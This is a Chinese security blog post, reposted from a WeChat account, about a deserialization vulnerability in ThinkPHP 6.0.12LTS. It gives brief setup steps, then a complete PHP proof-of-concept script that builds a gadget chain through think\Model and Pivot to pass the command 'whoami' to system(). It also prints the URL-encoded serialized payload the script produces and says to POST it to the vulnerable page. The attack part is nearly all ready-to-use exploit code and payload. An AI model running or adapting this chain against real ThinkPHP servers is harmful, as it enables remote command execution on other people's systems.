ThinkPHP V6.0.12LTS 反序列化漏洞

admin 2022年7月3日10:28:47评论325 views字数 1798阅读5分59秒阅读模式

01

环境搭建



composer create-project topthink/think=6.0.12 tp612


添加反序列化入口


ThinkPHP V6.0.12LTS 反序列化漏洞


02

漏洞复现



Exp

<?phpnamespace think {    abstract class Model {        private $lazySave = false;        private $data = [];        private $exists = false;        protected $table;        private $withAttr = [];        protected $json = [];        protected $jsonAssoc = false;
public function __construct($obj='') { $this->lazySave = true; $this->data = ['whoami'=>['whoami']]; $this->exists = true; $this->table = $obj; $this->withAttr = ['whoami'=>['system']]; $this->json = ['whoami']; $this->jsonAssoc = true; } }}
namespace thinkmodel { use thinkModel; class Pivot extends Model { } $p = new Pivot(new Pivot()); echo urlencode(serialize($p));}

使用脚本生成payload

O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D

在漏洞页面,使用post方式传参即可

ThinkPHP V6.0.12LTS 反序列化漏洞





如有侵权,请联系删除。

ThinkPHP V6.0.12LTS 反序列化漏洞

扫码关注我们

查看更多精彩内容




原文始发于微信公众号(长风实验室):ThinkPHP V6.0.12LTS 反序列化漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月3日10:28:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ThinkPHP V6.0.12LTS 反序列化漏洞https://cn-sec.com/archives/1152581.html

发表评论

匿名网友 填写信息